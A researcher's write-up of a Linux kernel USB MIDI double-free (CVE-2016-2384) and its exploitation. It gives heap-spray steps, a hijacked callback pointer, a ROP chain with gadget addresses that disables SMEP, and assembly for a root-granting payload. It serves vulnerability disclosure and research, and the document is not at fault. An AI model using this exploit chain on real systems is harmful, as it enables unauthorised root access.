While playing around with the vUSBf kernel fuzzer, I found a vulnerability (CVE-2016-2384) in the Linux kernel USB MIDI driver. I reproduced the bug with a Facedancer21 board and wrote an exploit to gain code execution within the kernel. My exploit requires user space cooperation, but the bug is exploitable externally provided one finds the right primitives.


Overview

The bug in the USB MIDI driver is a double-free of a kmalloc-512 object, which occurs when a malicious USB device is plugged in. The vulnerability is only present if the USB MIDI module is enabled, but this is the case for many modern distributions. The bug has been fixed in the mainline kernel by Takashi Iwai.

I found this bug with KASAN (KernelAddressSanitizer), a kernel memory error detector, and vUSBf, a virtual USB fuzzer.

I wrote a proof-of-concept exploit for this vulnerability, which achieves either:

  1. Denial of service. Requires physical access: the ability to plug in a malicious USB device. All kernel versions that include the USB MIDI driver are vulnerable to this attack. I managed to cause a kernel panic on machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic), Fedora 22 (4.1.5-200.fc22.x86_64), and CentOS 6 (2.6.32-584.12.2.el6.x86_64).

  2. Arbitrary code execution within the kernel, and therefore a privilege escalation. Requires both physical and local access: the ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user. All kernel versions starting from v3.0 are vulnerable to this attack. I managed to gain root privileges on machines with the following kernels: Ubuntu 14.04 (3.19.0-49-generic), Linux Mint 17.3 (3.19.0-32-generic), and Fedora 22 (4.1.5-200.fc22.x86_64). All machines had SMEP turned on but didn’t have SMAP.

The exploit uses a Facedancer21 board to physically emulate a malicious USB device. The exploit bypasses SMEP but doesn’t bypass SMAP. It has about a 50% success rate; the kernel crashes on failure. Check out the demo video.

It should be possible to make the exploit for gaining code execution physical-access–only, but I didn’t investigate this thoroughly.

Update from 2021: Martijn Bogaard and Dana Geist have managed to exploit this bug purely over USB; see their Achieving Linux Kernel Code Execution Through a Malicious USB Device talk for details.

Bug details

The bug in the USB MIDI driver is a double-free of a snd_usb_midi object, which occurs when a Midiman USB device with an invalid number of endpoints is plugged in. If you don’t know what a USB endpoint is, or if you’re interested in how the USB protocol works in general, I recommend reading up on it here.

Whenever a USB device is plugged in, the kernel determines which driver is responsible for it and calls the corresponding probe() function. During probing, the driver initializes the device. When probing a maliciously crafted USB MIDI device, everything goes all right until the end of snd_usbmidi_create(), when the following code is executed:

if (quirk && quirk->type == QUIRK_MIDI_MIDIMAN)
        err = snd_usbmidi_create_endpoints_midiman(umidi, &endpoints[0]);
else
        err = snd_usbmidi_create_endpoints(umidi, endpoints);
if (err < 0) {
        snd_usbmidi_free(umidi);
        return err;
}

For a Midiman device, snd_usbmidi_create_endpoints_midiman() gets called. This function initializes USB endpoints specific to Midiman devices. If an invalid number of endpoints (say, zero) is provided in the USB descriptor, then snd_usbmidi_create_endpoints_midiman() fails on the following check:

if (intfd->bNumEndpoints < (endpoint->out_cables > 0x0001 ? 5 : 3)) {
        dev_dbg(&umidi->dev->dev, "not enough endpoints\n");
        return -ENOENT;
}

After that, snd_usbmidi_free() gets called and frees the snd_usb_midi object. Then, since the device probing failed, clean-up routines are invoked, and one of them calls snd_usbmidi_free() again on the same object. This results in a double-free.
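
The control flow that leads to the second free can be modelled in user space. This is a minimal sketch, not kernel code: the toy_* names are hypothetical, the free routine only counts calls instead of calling kfree(), and toy_probe() stands in for whichever clean-up routine frees the object again.

```c
#include <errno.h>

/* Toy stand-in for struct snd_usb_midi; it only counts how often it was "freed". */
struct toy_umidi {
    int free_calls;
};

/* Stand-in for snd_usbmidi_free(): records the call instead of calling kfree(). */
static void toy_usbmidi_free(struct toy_umidi *umidi)
{
    umidi->free_calls++;
}

/* Mirrors the endpoint-count check quoted above. */
static int toy_create_endpoints_midiman(int num_endpoints, unsigned out_cables)
{
    if (num_endpoints < (out_cables > 0x0001 ? 5 : 3))
        return -ENOENT;
    return 0;
}

/* Mirrors the tail of snd_usbmidi_create(): frees the object on error. */
static int toy_usbmidi_create(struct toy_umidi *umidi, int num_endpoints,
                              unsigned out_cables)
{
    int err = toy_create_endpoints_midiman(num_endpoints, out_cables);

    if (err < 0) {
        toy_usbmidi_free(umidi); /* first free */
        return err;
    }
    return 0;
}

/* Hypothetical probe wrapper: on failure, the generic clean-up frees again. */
int toy_probe(struct toy_umidi *umidi, int num_endpoints, unsigned out_cables)
{
    int err = toy_usbmidi_create(umidi, num_endpoints, out_cables);

    if (err < 0)
        toy_usbmidi_free(umidi); /* second free of the same object */
    return err;
}
```

Calling toy_probe() with zero endpoints leaves free_calls at 2, while a descriptor with enough endpoints never reaches either free.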

Here is the KASAN report (line numbers are for the mainline kernel v4.4). KASAN reports a use-after-free, since the snd_usb_midi object is used in between the two kfree()s, and that is what KASAN detects.

The bug is only triggered with a device ID that is listed with QUIRK_MIDI_MIDIMAN in sound/usb/quirks-table.h. As pointed out by kernel developers, for other USB MIDI devices, USB descriptors are checked earlier. Thus, the only way to fail snd_usbmidi_create_endpoints() (without _midiman) and cause snd_usbmidi_free() to be called would be to run out of memory.

Here is the USB device descriptor I used to trigger the bug. The important parameters are: idVendor = 0x0763 (Midiman), idProduct = 0x1002 (MidiSport 2x2), and one of the configurations should have an interface with bInterfaceClass = 255 and zero endpoints. The idProduct should correspond to any supported Midiman device.
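
For readers who want to see the relevant fields side by side, here is a rough sketch of the two descriptors as packed C structs. The layouts follow the standard USB device and interface descriptors; only idVendor, idProduct, bInterfaceClass, and bNumEndpoints come from the description above. Every other value (bcdUSB, bMaxPacketSize0, bNumConfigurations) and the struct and variable names are assumptions for illustration.

```c
#include <stdint.h>

/* Standard USB device descriptor: 18 bytes on the wire. */
struct usb_device_desc {
    uint8_t  bLength;
    uint8_t  bDescriptorType;
    uint16_t bcdUSB;
    uint8_t  bDeviceClass;
    uint8_t  bDeviceSubClass;
    uint8_t  bDeviceProtocol;
    uint8_t  bMaxPacketSize0;
    uint16_t idVendor;
    uint16_t idProduct;
    uint16_t bcdDevice;
    uint8_t  iManufacturer;
    uint8_t  iProduct;
    uint8_t  iSerialNumber;
    uint8_t  bNumConfigurations;
} __attribute__((packed));

/* Standard USB interface descriptor: 9 bytes on the wire. */
struct usb_interface_desc {
    uint8_t bLength;
    uint8_t bDescriptorType;
    uint8_t bInterfaceNumber;
    uint8_t bAlternateSetting;
    uint8_t bNumEndpoints;
    uint8_t bInterfaceClass;
    uint8_t bInterfaceSubClass;
    uint8_t bInterfaceProtocol;
    uint8_t iInterface;
} __attribute__((packed));

const struct usb_device_desc midiman_device = {
    .bLength            = sizeof(struct usb_device_desc),
    .bDescriptorType    = 0x01,   /* DEVICE */
    .bcdUSB             = 0x0200, /* assumption: USB 2.0 */
    .bMaxPacketSize0    = 64,     /* assumption */
    .idVendor           = 0x0763, /* Midiman */
    .idProduct          = 0x1002, /* MidiSport 2x2 */
    .bNumConfigurations = 1,      /* assumption */
};

const struct usb_interface_desc midiman_interface = {
    .bLength         = sizeof(struct usb_interface_desc),
    .bDescriptorType = 0x04, /* INTERFACE */
    .bNumEndpoints   = 0,    /* the invalid endpoint count that triggers the bug */
    .bInterfaceClass = 255,  /* vendor specific */
};
```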

Exploitation

Now, let me show how I exploited this bug.

Denial of service

Causing a denial of service is fairly easy. A double-free corrupts kernel memory, so it’s enough to connect the USB device a few times for the kernel to crash. This only requires physical access to the machine.

Here is the script meant to be used with a Facedancer21 board to emulate the USB device described above.

Arbitrary code execution

Executing arbitrary code is also possible, though it’s more difficult to achieve. Overall, I turned this double-free into a racy-use-after-free and made the kernel call a crafted function pointer, which pointed to a privilege-escalation payload.

Let me go through this step by step.

If you don’t know how the Linux kernel slab allocator works or what kmalloc() caches are, read up on it before proceeding (for example here, though it’s somewhat outdated).

An snd_usb_midi object is allocated via kmalloc() and falls into the kmalloc-512 cache. Whenever a network packet is sent, an sk_buff object is created by the kernel. The sk_buff is allocated via kmalloc() as well, and it falls into different caches depending on the packet size. It ends up in kmalloc-512 when the packet size is 128 bytes.
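
To make the idea of size classes concrete, here is a small sketch that maps a request size to the general-purpose cache it would be served from. The list of sizes is an assumption based on what is commonly seen on x86-64 SLUB kernels; the exact set depends on the allocator and the kernel configuration, and kmalloc_cache_size() is a hypothetical helper, not a kernel function.

```c
#include <stddef.h>

/* Assumed kmalloc size classes (commonly seen with SLUB on x86-64). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/*
 * Returns the object size of the smallest cache that fits `size`,
 * or 0 if the request is larger than every listed cache.
 */
size_t kmalloc_cache_size(size_t size)
{
    size_t count = sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]);

    for (size_t i = 0; i < count; i++) {
        if (size <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    }
    return 0;
}
```

Under this assumption, any request between 257 and 512 bytes shares kmalloc-512, which is why two unrelated objects can end up in the same slab slot.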

Instead of letting the mentioned double-free happen, I used it to cause a use-after-free on an sk_buff.

Imagine that an sk_buff is allocated in between the two kfree()s of the snd_usb_midi and is placed into the same slab object. In this case, if this slab object is allocated again before getting freed as an sk_buff, the sk_buff’s content can be overwritten while it’s still in use. And that’s what I did.

What did I get from overwriting the sk_buff? It turns out that whenever an sk_buff is allocated, an skb_shared_info struct is placed at the end of it. Take a look at its definition:

struct skb_shared_info {
        unsigned char   nr_frags;
        __u8            tx_flags;
        unsigned short  gso_size;
        unsigned short  gso_segs;
        unsigned short  gso_type;
        struct sk_buff  *frag_list;
        struct skb_shared_hwtstamps hwtstamps;
        u32             tskey;
        __be32          ip6_frag_id;
        atomic_t        dataref;
        void *          destructor_arg;
        skb_frag_t      frags[MAX_SKB_FRAGS];
};

The skb_shared_info has a destructor_arg field, which points to a ubuf_info struct (though it’s declared as a void * pointer). Here’s the definition of ubuf_info:

struct ubuf_info {
        void (*callback)(struct ubuf_info *, bool zerocopy_success);
        void *ctx;
        unsigned long desc;
};

It contains a function pointer. And function pointers have a tendency of being called; more on that later.

My idea was to overwrite the destructor_arg in the skb_shared_info that belongs to an sk_buff and make it point to a crafted ubuf_info. That ubuf_info would have the callback field set to a controlled value, which I would then make the kernel call.

For that, I needed the following primitives:

  1. Allocating a 512-byte sk_buff.
  2. Allocating a 512-byte object via kmalloc() with controlled data.
  3. Triggering ubuf_info->callback().

My approach was to do these from the user space by calling syscalls from a binary running as a non-privileged user.

As I mentioned, a 512-byte sk_buff is allocated whenever a 128-byte packet is sent. The allocated sk_buff won’t be freed until the packet is delivered, its delivery fails, or the socket is closed. Thus, I could allocate sk_buffs by creating a couple of sockets and sending UDP packets from one to the other.
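
A minimal user space sketch of this primitive follows. It binds a UDP receiver on the loopback interface, sends 128-byte datagrams to it, and never reads them, so the packets stay queued until the sockets are closed. The helper name queue_udp_packets() and the use of loopback with a kernel-chosen port are assumptions for illustration, and error paths leave the file descriptors open for brevity.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define PACKET_SIZE 128

/*
 * Opens a receiver (fds[0]) and a sender (fds[1]) and sends `count`
 * datagrams that are never read. Returns the number of packets sent,
 * or -1 if the sockets could not be set up.
 */
int queue_udp_packets(int count, int fds[2])
{
    struct sockaddr_in addr;
    socklen_t addr_len = sizeof(addr);
    char packet[PACKET_SIZE];
    int sent = 0;

    fds[0] = socket(AF_INET, SOCK_DGRAM, 0);
    fds[1] = socket(AF_INET, SOCK_DGRAM, 0);
    if (fds[0] < 0 || fds[1] < 0)
        return -1;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = 0; /* let the kernel pick a free port */
    if (bind(fds[0], (struct sockaddr *)&addr, sizeof(addr)) < 0)
        return -1;
    /* Learn which port was picked so the sender can target it. */
    if (getsockname(fds[0], (struct sockaddr *)&addr, &addr_len) < 0)
        return -1;

    memset(packet, 'A', sizeof(packet));
    for (int i = 0; i < count; i++) {
        if (sendto(fds[1], packet, sizeof(packet), 0,
                   (struct sockaddr *)&addr, sizeof(addr)) != PACKET_SIZE)
            break;
        sent++;
    }
    return sent;
}
```

Closing fds[0] later is what releases the queued packets, which gives the caller control over when the corresponding buffers are freed.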

Next, I needed a way to allocate a 512-byte object with controlled data. There’s actually a way to allocate objects from user space with both the size and the data controlled: sending control messages on a socket with the sendmmsg() syscall. During sendmmsg(), the kernel allocates a buffer for the control message via kmalloc() and copies the message there.

Finally, I needed to somehow trigger the callback. This was straightforward: the callback gets called when the corresponding sk_buff is being freed:

static void skb_release_data(struct sk_buff *skb)
{
        struct skb_shared_info *shinfo = skb_shinfo(skb);

        /* ... */

        if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
                struct ubuf_info *uarg;

                uarg = shinfo->destructor_arg;
                if (uarg->callback)
                        uarg->callback(uarg, true);
        }

        /* ... */
}

As you can see, it only gets called when shinfo->tx_flags has the SKBTX_DEV_ZEROCOPY flag set, but I could set it to the desired value as well as the destructor_arg.
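
Here is a sketch of how the replacement object could be laid out in user space. It rests on several assumptions that are not spelled out in this article: an x86-64 layout in which skb_shared_info is 320 bytes and sits at the tail of the 512-byte object, MAX_SKB_FRAGS equal to 17, and SKBTX_DEV_ZEROCOPY equal to 1 << 3 (the value I would expect in v4.4 headers). The fake_* structs are hypothetical mirrors with fixed-width fields, not the kernel definitions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OBJECT_SIZE        512
#define MAX_SKB_FRAGS      17       /* assumption: 4 KiB pages */
#define SKBTX_DEV_ZEROCOPY (1 << 3) /* assumption: value in v4.4 headers */

/* Mirror of struct ubuf_info with 64-bit fields. */
struct fake_ubuf_info {
    uint64_t callback;
    uint64_t ctx;
    uint64_t desc;
};

/* Mirror of struct skb_shared_info (assumed x86-64 layout, 320 bytes). */
struct fake_shared_info {
    uint8_t  nr_frags;
    uint8_t  tx_flags;
    uint16_t gso_size;
    uint16_t gso_segs;
    uint16_t gso_type;
    uint64_t frag_list;
    uint64_t hwtstamps;
    uint32_t tskey;
    uint32_t ip6_frag_id;
    uint32_t dataref;
    uint64_t destructor_arg;
    uint8_t  frags[MAX_SKB_FRAGS * 16];
};

/*
 * Fills a 512-byte buffer so that its tail looks like an skb_shared_info
 * with the zerocopy flag set and destructor_arg pointing at `uarg`.
 */
void build_fake_object(uint8_t object[OBJECT_SIZE],
                       const struct fake_ubuf_info *uarg)
{
    struct fake_shared_info shinfo;

    memset(object, 0, OBJECT_SIZE);
    memset(&shinfo, 0, sizeof(shinfo));
    shinfo.tx_flags = SKBTX_DEV_ZEROCOPY;
    shinfo.destructor_arg = (uint64_t)(uintptr_t)uarg;
    memcpy(object + OBJECT_SIZE - sizeof(shinfo), &shinfo, sizeof(shinfo));
}
```

On a different kernel version or architecture the offsets would have to be rechecked against the real headers.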

So calling the callback is achieved via the following sequence of events:

  1. snd_usb_midi is freed.
  2. sk_buff is allocated in the same place when sending a packet on a socket.
  3. snd_usb_midi is freed again, therefore technically freeing the sk_buff, which is still being used.
  4. An object is allocated via sendmmsg() in the same place, overwriting the skb_shared_info in the sk_buff.
  5. sk_buff is freed, triggering the callback.
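
The sequence above can be replayed on a toy allocator to see why the two later allocations overlap. This is a simplified model that assumes a plain last-in-first-out freelist with no double-free detection; the real slab allocator has per-CPU lists and more state, and all toy_* names are hypothetical.

```c
#define NUM_SLOTS 4

/* Toy cache: a LIFO stack of free slot indices. */
struct toy_cache {
    int free_stack[NUM_SLOTS * 2]; /* room for the duplicate entry */
    int top;
};

void toy_cache_init(struct toy_cache *c)
{
    c->top = 0;
    for (int i = NUM_SLOTS - 1; i >= 0; i--)
        c->free_stack[c->top++] = i;
}

/* Pops the most recently freed slot, or returns -1 if the cache is empty. */
int toy_alloc(struct toy_cache *c)
{
    return c->top > 0 ? c->free_stack[--c->top] : -1;
}

/* Pushes the slot back without checking whether it is already free. */
void toy_free(struct toy_cache *c, int slot)
{
    if (c->top < NUM_SLOTS * 2)
        c->free_stack[c->top++] = slot;
}

/*
 * Replays the five steps. Returns 1 if the sk_buff and the control
 * message ended up in the same slot, 0 otherwise.
 */
int replay_sequence(void)
{
    struct toy_cache cache;
    int umidi, skb, ctl;

    toy_cache_init(&cache);
    umidi = toy_alloc(&cache); /* snd_usb_midi allocated during probing */
    toy_free(&cache, umidi);   /* 1. first free */
    skb = toy_alloc(&cache);   /* 2. sk_buff reuses the slot */
    toy_free(&cache, umidi);   /* 3. second free releases the live slot */
    ctl = toy_alloc(&cache);   /* 4. control message lands on the sk_buff */
    /* 5. freeing the sk_buff would now read attacker-controlled bytes */
    return skb == umidi && ctl == skb;
}
```

In the real exploit the ordering is not deterministic like this, which is where the raciness comes from.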

As the callback value is controlled, it can be pointed to any payload, which is going to be executed with kernel privileges. By using a classic commit_creds(prepare_kernel_cred(0)) payload, I could gain root access.

But where to allocate the ubuf_info struct, which holds the callback pointer? The simplest way is to place it in the user space (as a global variable or with mmap()). The same goes for the payload that gets executed (unless using ROP to bypass SMEP, see the next section).

The v3.0+ requirement comes from the fact that the callback field wasn’t present before v3.0. However, one might find other in-kernel objects of size 512 with function pointers in them, which can be used for exploitation.

In practice, my exploit opens multiple sockets and keeps sending 128-byte packets as well as control messages in a loop, while I manually connect an emulated USB device at the same time. The success of the exploitation relies on a set of kmalloc() and kfree() calls happening in the right order, but the exploit I wrote works with a fairly good success rate of about 50%.

As slab objects might be cached in per-CPU lists, it’s better to run several instances of the user space exploit binary, at least as many as there are CPU cores. This increases the probability that at least one of the binaries is scheduled on the CPU that performs the probing and can therefore allocate objects from that CPU’s cache.
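
One way to get an instance per core without starting the binary by hand several times is to fork. The sketch below is an assumption about how this could be automated, not how my exploit does it: spawn_worker_per_cpu() and example_worker() are hypothetical names, and the processes are not pinned, so the scheduler still decides where each one runs.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Placeholder for the per-process spray loop (hypothetical). */
void example_worker(void)
{
}

/*
 * Forks one child per online CPU, runs `worker` in each child, and waits
 * for all of them. Returns the number of children started, or -1 if the
 * CPU count is unavailable.
 */
long spawn_worker_per_cpu(void (*worker)(void))
{
    long cpus = sysconf(_SC_NPROCESSORS_ONLN);
    long started = 0;

    if (cpus < 1)
        return -1;

    for (long i = 0; i < cpus; i++) {
        pid_t pid = fork();

        if (pid == 0) {
            worker();
            _exit(0); /* the child never returns to the caller */
        }
        if (pid > 0)
            started++;
    }

    for (long i = 0; i < started; i++)
        wait(NULL);
    return started;
}
```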

Kernel hardening

The Linux kernel supports a few hardening features, which make the exploitation more difficult.

For instance, there are SMEP (Supervisor Mode Execution Protection) and SMAP (Supervisor Mode Access Prevention). SMEP causes an oops whenever the kernel tries to execute code from the user space memory, and SMAP causes an oops whenever the kernel tries to access the user space memory directly.

If you take a careful look at the exploitation process I described above, you will see that both SMEP and SMAP would prevent the exploit from executing code. SMEP would detect that the code is executed from the user space when the callback is called, and SMAP would detect that ubuf_info is being accessed as it’s placed in the user space.

SMAP and SMEP are both CPU features that require support on the kernel side. Such features are only enabled if all of the following conditions are met:

  1. The CPU supports it.
  2. The kernel supports it.
  3. It’s enabled in the kernel configuration.

The kernel has had SMEP support since v3.0 and SMAP support since v3.7, and both are usually enabled in modern distributions. However, while Intel CPUs have supported SMEP for a few years (since the Ivy Bridge architecture), SMAP support was added quite recently (starting from the Broadwell architecture), and therefore not many CPUs have it.
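
A quick way to see what a given machine reports is to look for the smep and smap entries on the flags line of /proc/cpuinfo. The helper below is a small sketch that checks such a line for a whole-word match; has_cpu_flag() is a hypothetical name, and reading the file itself is left to the caller.

```c
#include <stddef.h>
#include <string.h>

/*
 * Returns 1 if `flag` appears as a whole space-separated word in
 * `flags_line` (for example the "flags" line of /proc/cpuinfo), else 0.
 */
int has_cpu_flag(const char *flags_line, const char *flag)
{
    size_t len = strlen(flag);
    const char *p = flags_line;

    if (len == 0)
        return 0;

    while ((p = strstr(p, flag)) != NULL) {
        int starts_word = (p == flags_line) || p[-1] == ' ' || p[-1] == '\t';
        int ends_word = p[len] == '\0' || p[len] == ' ' || p[len] == '\n';

        if (starts_word && ends_word)
            return 1;
        p += len; /* keep searching after this partial match */
    }
    return 0;
}
```

The whole-word check matters because a plain substring search would, for instance, report "sme" as present whenever "smep" is.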

Another existing Linux kernel hardening technique is KASLR (Kernel Address-Space Layout Randomization). The kernel supports it starting from v3.14. However, at the moment, KASLR is disabled by default in most modern distributions.

All in all, I only had to bypass SMEP to make the exploit work on a wide range of modern kernels and CPUs.

Bypassing SMEP

The classical way to bypass SMEP is to use in-kernel ROP (Return-Oriented Programming), and that’s what I did. If you’re not familiar with ROP, I suggest reading up on it; there are many tutorials available. Here, I’m going to assume that the CPU has the x86-64 architecture.

Overall, I used an xchg eax, esp gadget to set the stack pointer to a particular address in the user space, put a ROP chain at that address, disabled SMEP via ROP, restored the stack pointer, and then jumped to a commit_creds(prepare_kernel_cred(0)) payload residing in the user space memory.

Let me go through this step by step.

First, take a look at the disassembly around the code that calls the callback:

                if (uarg->callback)
ffffffff816c39b9:       48 8b 07                mov    (%rdi),%rax
ffffffff816c39bc:       48 85 c0                test   %rax,%rax
ffffffff816c39bf:       74 07                   je     ffffffff816c39c8 <skb_release_data+0x98>
                        uarg->callback(uarg, true);
ffffffff816c39c1:       be 01 00 00 00          mov    $0x1,%esi
ffffffff816c39c6:       ff d0                   callq  *%rax

As you can see, the address of the callback is stored in the rax register and then callq is used to call it.

Imagine that the callback contains the address of the xchg eax, esp ; ret gadget. In that case, after callq *%rax, this gadget will get executed. It will swap the values of eax and esp and, at the same time, zero out the higher 32 bits of rax and rsp (see this for details). Therefore, if the gadget address is 0xffffffff8100008a, then the new rsp value will be 0x000000008100008a, which is a user space address. If I mmap() this address in advance, I will get control of the stack. As a side note, this fake stack would reside in the user space, and that’s another thing that SMAP would detect.
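
The arithmetic behind the pivot is simple enough to write down. This sketch computes the stack pointer that results from the gadget and the page that has to be mapped in advance; the function names are hypothetical and the 4 KiB page size is an assumption.

```c
#include <stdint.h>

#define PAGE_SIZE_BYTES 0x1000ULL /* assumption: 4 KiB pages */

/*
 * Value of rsp after `xchg eax, esp` when rax holds the gadget address:
 * the 32-bit operation clears the upper half of the register.
 */
uint64_t pivoted_rsp(uint64_t gadget_addr)
{
    return gadget_addr & 0xffffffffULL;
}

/* Page-aligned address that must be mapped for the fake stack to exist. */
uint64_t fake_stack_page(uint64_t gadget_addr)
{
    return pivoted_rsp(gadget_addr) & ~(PAGE_SIZE_BYTES - 1);
}
```

For the example address 0xffffffff8100008a, the fake stack starts at 0x8100008a, inside the page at 0x81000000.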

Now, I could put anything into this stack and execute an arbitrary ROP chain.

There was an issue though. After executing the ROP chain in user space, the execution must somehow return to the kernel. Otherwise, the kernel will crash.

I couldn’t simply return to where the callback was called from: the original stack pointer value had to be restored first. For this, I couldn’t just do xchg eax, esp again, since after the first xchg the higher 32 bits of the original rsp value are lost. However, I found a way to restore the lost 32 bits of the stack pointer.

Note from the future: Recovering the stack pointer was not actually required. Instead, I could use iretq. But I didn’t know about this technique when I was writing the exploit.

If you think about it, rbp has a very close value to rsp, since rsp is saved into rbp in each function’s prologue. Therefore, the chances that they have the same higher 32 bits are very high. Thus, I could use the higher 32 bits of rbp as the higher 32 bits of rsp and the eax value after the xchg gadget as the lower 32 bits of rsp.

For that, I had to save the eax value right after the xchg, so that I could use the rax register in the ROP chain. I saved it into a user space variable with the first few gadgets in the ROP chain. This is another place where the exploit accesses the user space, which would be detected by SMAP.
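
The reconstruction itself is a single expression: the upper half comes from rbp and the lower half from the saved eax. Here is a sketch in C, where restore_rsp() is a hypothetical name and the values in the usage note are made up for illustration.

```c
#include <stdint.h>

/*
 * Rebuilds the original rsp from the upper 32 bits of rbp and the lower
 * 32 bits that were saved right after the xchg gadget. This only works
 * if rbp and the original rsp share their upper 32 bits.
 */
uint64_t restore_rsp(uint64_t rbp, uint32_t saved_eax)
{
    return (rbp & 0xffffffff00000000ULL) | saved_eax;
}
```

For instance, with rbp equal to 0xffff88003b7a3e50 and a saved eax of 0x3b7a3e18, the function yields 0xffff88003b7a3e18.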

I used the following ROP gadgets to save the eax value:

0xffffffff8118991d : pop rdi ; ret
0xffffffff810fff17 : mov dword ptr [rdi], eax ; ret

So the first part of the payload looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17L

#define CHAIN_SAVE_EAX                  \
  *stack++ = POP_RDI_RET;               \
  *stack++ = (uint64_t)&saved_eax;      \
  *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;

Once eax was saved, I could proceed with executing arbitrary ROP gadgets.

While it was possible to compose a privilege-escalation payload based on ROP, instead, I chose to disable SMEP and execute the commit_creds(prepare_kernel_cred(0)) payload from the user space.

Whether SMEP is enabled is controlled by bit 20 of the cr4 register. There are a few gadgets in the kernel that allow setting the cr4 value. I used these:

0xffffffff8118991d : pop rdi ; ret
0xffffffff8105b8f0 : push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret

Note that the second gadget also pushes and then pops back the rbp register. Omitting the push from the gadget would corrupt rbp on the pop.

Thus, the next part of the ROP chain looks like:

#define POP_RDI_RET               0xffffffff8118991dL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0L
#define CR4_DESIRED_VALUE         0x407f0

#define CHAIN_SET_CR4                   \
  *stack++ = POP_RDI_RET;               \
  *stack++ = CR4_DESIRED_VALUE;         \
  *stack++ = MOV_CR4_RDI_RET;           
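
The desired cr4 value is just the current value with the SMEP bit (bit 20) cleared. A small sketch of that computation follows; the helper names are hypothetical, and 0x1407f0 in the usage note is an assumed example of a cr4 value with SMEP set, chosen because clearing bit 20 gives the 0x407f0 constant used in the chain.

```c
#include <stdint.h>

#define CR4_SMEP_BIT 20

/* Returns 1 if the SMEP bit is set in the given cr4 value. */
int cr4_has_smep(uint64_t cr4)
{
    return (int)((cr4 >> CR4_SMEP_BIT) & 1);
}

/* Returns the cr4 value with only the SMEP bit cleared. */
uint64_t cr4_without_smep(uint64_t cr4)
{
    return cr4 & ~(1ULL << CR4_SMEP_BIT);
}
```

With these helpers, cr4_without_smep(0x1407f0) evaluates to 0x407f0. On a machine with a different set of cr4 bits enabled, the constant would need to be adjusted accordingly.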

Once SMEP was disabled, I could jump to the user space payload. I used these gadgets for that:

0xffffffff810053bc : pop rcx ; ret
0xffffffff81040a90 : jmp rcx

And here is the last part of the ROP chain:

#define POP_RCX_RET               0xffffffff810053bcL
#define JMP_RCX                   0xffffffff81040a90L

#define CHAIN_JMP_PAYLOAD               \
  *stack++ = POP_RCX_RET;               \
  *stack++ = (uint64_t)&payload;        \
  *stack++ = JMP_RCX;
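
Put together, the three parts form a chain of nine 64-bit words. The sketch below writes them into a caller-provided buffer in the order described so far. build_rop_chain() is a hypothetical helper, it takes the addresses of saved_eax and payload as plain integers so that it stays self-contained, and the gadget addresses are the ones listed in this article, so they only apply to that particular kernel binary.

```c
#include <stddef.h>
#include <stdint.h>

#define POP_RDI_RET               0xffffffff8118991dULL
#define MOV_DWORD_PTR_RDI_EAX_RET 0xffffffff810fff17ULL
#define MOV_CR4_RDI_RET           0xffffffff8105b8f0ULL
#define CR4_DESIRED_VALUE         0x407f0ULL
#define POP_RCX_RET               0xffffffff810053bcULL
#define JMP_RCX                   0xffffffff81040a90ULL

/*
 * Writes the full chain to `stack` and returns the number of 64-bit
 * words written. `stack` must have room for at least nine entries.
 */
size_t build_rop_chain(uint64_t *stack, uint64_t saved_eax_addr,
                       uint64_t payload_addr)
{
    uint64_t *start = stack;

    /* Save eax (the lower half of the original rsp) to user space. */
    *stack++ = POP_RDI_RET;
    *stack++ = saved_eax_addr;
    *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;

    /* Disable SMEP by loading a cr4 value with bit 20 cleared. */
    *stack++ = POP_RDI_RET;
    *stack++ = CR4_DESIRED_VALUE;
    *stack++ = MOV_CR4_RDI_RET;

    /* Jump to the user space payload. */
    *stack++ = POP_RCX_RET;
    *stack++ = payload_addr;
    *stack++ = JMP_RCX;

    return (size_t)(stack - start);
}
```

In the exploit, the buffer would be the memory mapped at the pivoted stack address, so the first word is what the ret of the xchg gadget pops.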

I wrote the user space payload in assembly, which was much handier than doing ROP:

// Unfortunately GCC does not support `__attribute__((naked))` on x86, which
// can be used to omit a function's prologue, so I had to use this weird
// wrapper hack as a workaround. Note: Clang does support it, which means it
// has better support of GCC attributes than GCC itself. Funny.
void wrapper() {
  asm volatile ("                         \n\
    payload:                              \n\
      movq %%rbp, %%rax                   \n\
      movq $0xffffffff00000000, %%rdx     \n\
      andq %%rdx, %%rax                   \n\
      movq %0, %%rdx                      \n\
      addq %%rdx, %%rax                   \n\
      movq %%rax, %%rsp                   \n\
      jmp get_root                        \n\
  " : : "m"(saved_eax) : );
}

void payload();

The payload first restores rsp using rbp and the saved eax, and then jumps to get_root(), which calls commit_creds(prepare_kernel_cred(0)).

There’s a reason why the rsp value is restored first. That’s because the current kernel thread can get rescheduled by the kernel during get_root(). Since the structure that describes a kernel thread is stored at the end of its stack, the kernel won’t find it there and will crash.

After get_root() is executed, the kernel naturally returns to where the payload was called from by following the return address that had been put on the original stack by callq *%rax.

And that’s it. I have successfully bypassed SMEP and got root privileges! Woohoo!

Here is a demo video.

I used ROPgadget to extract the gadgets. All of the gadgets I used were present in all of the stock kernel binaries I looked at (except for jmp rcx, but it’s easily replaceable). Note that gadgets shouldn’t be extracted from the .init.text section of a kernel binary, since the code there gets overwritten after the kernel is done booting.

Initially, I was looking for something like xchg rax, rsp, so I wouldn’t need to mess around with restoring rsp that much, but gadgets of this kind were not present in the kernel binaries I looked at.

Conclusion

This is the first Linux kernel exploit that I’ve ever written. Even though I didn’t achieve code execution purely over USB, I’m excited to continue researching both the Linux kernel and the USB security fields.

💜 Thank you for reading!

Timeline

